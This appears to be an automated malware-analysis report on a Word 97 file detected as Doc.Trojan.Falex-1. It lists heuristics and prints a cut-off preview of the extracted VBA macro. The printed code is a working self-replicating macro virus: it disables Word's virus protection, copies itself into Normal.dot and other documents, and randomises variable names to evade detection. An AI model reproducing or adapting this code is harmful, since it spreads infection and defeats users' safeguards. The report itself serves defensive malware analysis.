MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word 97 document containing malicious VBA macros. The script attempts to copy its own code into the Normal.dot template, indicating a likely attempt at persistence or propagation. The ClamAV detection 'Doc.Trojan.Falex-1' further supports the malicious nature of the file.
Heuristics 2
-
ClamAV: Doc.Trojan.Falex-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Falex-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18744 bytes |
SHA-256: 4e64e814976ca8e110d55a677ee5180e8bd0186b2ca1a2ffe7565dd564e15cb3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Truex = True, Falsex = False, Zero = 0, One = 1, wdFormatDocumentx = wdFormatDocument, wdFormatTemplatex = wdFormatTemplate, DoubleDot = ":"
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim activedoc, normaltmp As Object
Dim ActiveDocName, OurCode As String
Set activedoc = ActiveDocument.VBProject.VBComponents.Item(One)
Set normaltmp = NormalTemplate.VBProject.VBComponents.Item(One)
DocumentInfected = Falsex
NormalTemplateInfected = Falsex
If activedoc.CodeModule.CountOfLines <> Zero Then DocumentInfected = Truex
If normaltmp.CodeModule.CountOfLines <> Zero Then NormalTemplateInfected = Truex
Options.VirusProtection = Falsex
If (DocumentInfected = Truex Xor NormalTemplateInfected = Truex) And (ActiveDocument.SaveFormat = wdFormatDocumentx Or ActiveDocument.SaveFormat = wdFormatTemplatex) Then
If DocumentInfected = Truex Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = activedoc.CodeModule.Lines(One, activedoc.CodeModule.CountOfLines)
Call AppendLog(OurCode)
Call PolyIt(OurCode)
normaltmp.CodeModule.InsertLines One, OurCode
If SaveNormalTemplate = Truex Then NormalTemplate.Save
End If
ActiveDocName = Mid(ActiveDocument.FullName, 2, One)
If NormalTemplateInfected = Truex And (ActiveDocName = DoubleDot Or ActiveDocument.Saved = Falsex) Then
SaveDocument = ActiveDocument.Saved
OurCode = normaltmp.CodeModule.Lines(1, normaltmp.CodeModule.CountOfLines)
activedoc.CodeModule.InsertLines One, OurCode
If SaveDocument = Truex Then ActiveDocument.Save
End If
End If
End Sub
Private Sub PolyIt(ByRef OurCode As String)
On Error Resume Next
Const PolyItVarCount = 16, VarCount = PolyItVarCount + 23, UpperLimit = 15, LowerLimit = 5, AsciiA = 65, AsciiZ = 90, One = 1
Dim Variable(One To VarCount), Variable2(One To VarCount), NewCode As String
Dim CounterI, CounterJ, CounterK As Integer
Dim Changed As Boolean
Variable(1) = "OurCode"
Variable(2) = "VarCount"
Variable(3) = "Variable"
Variable(4) = "Variable2"
Variable(5) = "NewCode"
Variable(6) = "CounterI"
Variable(7) = "CounterJ"
Variable(8) = "CounterK"
Variable(9) = "Changed"
Variable(10) = "PolyIt"
Variable(11) = "PolyItVarCount"
Variable(12) = "UpperLimit"
Variable(13) = "LowerLimit"
Variable(14) = "AsciiA"
Variable(15) = "AsciiZ"
Variable(16) = "One"
Variable(PolyItVarCount + 1) = "SaveDocument"
Variable(PolyItVarCount + 2) = "SaveNormalTemplate"
Variable(PolyItVarCount + 3) = "DocumentInfected"
Variable(PolyItVarCount + 4) = "NormalTemplateInfected"
Variable(PolyItVarCount + 5) = "activedoc"
Variable(PolyItVarCount + 6) = "normaltmp"
Variable(PolyItVarCount + 7) = "AppendLog"
Variable(PolyItVarCount + 8) = "UserAddy"
Variable(PolyItVarCount + 9) = "Chr13"
Variable(PolyItVarCount + 10) = "Chr10"
Variable(PolyItVarCount + 11) = "Comment"
Variable(PolyItVarCount + 12) = "UserAddyTmp"
Variable(PolyItVarCount + 13) = "UserNameTmp"
Variable(PolyItVarCount + 14) = "TimeDate"
Variable(PolyItVarCount + 15) = "ActiveDocName"
Variable(PolyItVarCount + 16) = "Truex"
Variable(PolyItVarCount + 17) = "Falsex"
Variable(PolyItVarCount + 18) = "Zero"
Variable(PolyItVarCount + 19) = "wdFormatDocumentx"
Variable(PolyItVarCount + 20) = "wdFormatTemplatex"
Variable(PolyItVarCount + 21) = "TimeFormat"
Variable(PolyItVarCount + 22) = "DateFormat"
Variable(PolyItVarCount + 23) = "DoubleDot"
Randomize
For CounterI = One To VarCount
For CounterJ = One To Int((UpperLimit - LowerLimit + One) * Rnd + LowerLimit)
Variable2(CounterI) = Variable2(CounterI) & Chr(Int((AsciiZ - AsciiA + 1) * Rnd + AsciiA))
Next CounterJ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.